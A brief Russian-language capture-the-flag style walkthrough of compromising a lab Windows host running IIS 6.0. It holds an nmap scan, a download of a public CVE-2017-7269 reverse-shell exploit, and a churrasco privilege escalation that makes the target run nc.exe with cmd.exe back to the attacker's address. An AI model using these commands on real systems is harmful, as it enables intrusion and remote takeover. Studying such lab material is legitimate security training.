Обзор сервисов
Проверим сервисы на машине 10.10.10.14
с помощью nmap
:
$ nmap -sV -sC -Pn -oN 10.10.10.14 10.10.10.14
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-ntlm-info:
| Target_Name: GRANPA
| NetBIOS_Domain_Name: GRANPA
| NetBIOS_Computer_Name: GRANPA
| DNS_Domain_Name: granpa
| DNS_Computer_Name: granpa
|_ Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Server Type: Microsoft-IIS/6.0
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| WebDAV type: Unknown
| Server Date: Fri, 21 May 2021 09:12:06 GMT
|_ Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Для этой версии веб-сервера IIS 6.0 существует эксплоит, которым мы воспользуемся.
curl -L -o exp.py https://raw.githubusercontent.com/g0rx/iis6-exploit-2017-CVE-2017-7269/master/iis6%20reverse%20shell
rlwrap -lnvp 1234
Повышение привилегий
На локальной машине развернем FTP-сервер и добавим в него эксплоит churassco и netcat:
wget https://github.com/int0x33/nc.exe/raw/master/nc.exe
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
python3 -m pyftpdlib -p 21
rlwrap nc -lnvp 1235
На удаленной машине подключимся к себе, скачаем эксплоит и неткат, затем запустим его:
> ftp -A 10.10.14.5
> binary
> get churrasco.exe
> get nc.exe
> bye
> churrasco.exe "nc.exe 10.10.14.5 1235 -e cmd.exe"